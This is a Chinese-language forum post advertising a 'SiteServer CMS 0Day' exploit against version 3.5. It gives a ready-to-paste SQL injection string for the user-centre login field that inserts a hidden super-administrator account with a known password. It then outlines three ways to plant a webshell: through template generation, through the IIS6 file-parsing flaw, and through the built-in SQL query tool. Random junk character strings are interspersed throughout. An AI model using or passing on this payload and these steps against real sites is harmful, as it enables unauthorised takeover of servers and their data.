SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
7 M# b9 i0 r# O( W
stieserver官网:www.siteserver.cn

+ r% d% e0 Q% }- T0 r6 Q
1 K) Z: A: c6 e
/ x9 c. d. U& Q% @- j8 _- Z% z% PEXP:

' d2 p, d2 y  `: K8 h直接访问UserCenter/login.aspx



4 M4 Q$ a# [  s# s9 U: ?  t用户名处输入：
( [9 G# ^) Y' A+ @' p8 v
: Q7 w9 ^4 l: s1 [8 H4 X123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
3 `. e4 q2 Z2 o& Y9 i

6 Q) _* p9 ]5 V. K7 }1 z+ n3 Y, I: O7 P
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


* u. l) R& Q" c- v7 u# Z
9 d6 l) P9 S* U5 _) |之后再访问后台SiteServer/login.aspx用插入的用户登陆
  x* ?0 @1 p( q4 q' h) ]* l: v


/ p: b* u. W' z: h* P后台拿webshell的三种方法：

; I5 g$ A( J( |( A) {一、
! c! E' L/ p& d1 c2 n2 A
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp

! B9 `9 \0 o6 q* A  P0 k6 M% G! c; bhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
% M' i: b. m* U8 Y5 S
: ~  r8 C5 @3 E（ps：后台添加用户时不会验证是否含有非法字符）

三、
7 d# j; w9 N. F5 q+ W
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

7 N) h3 I( c9 [+ i( x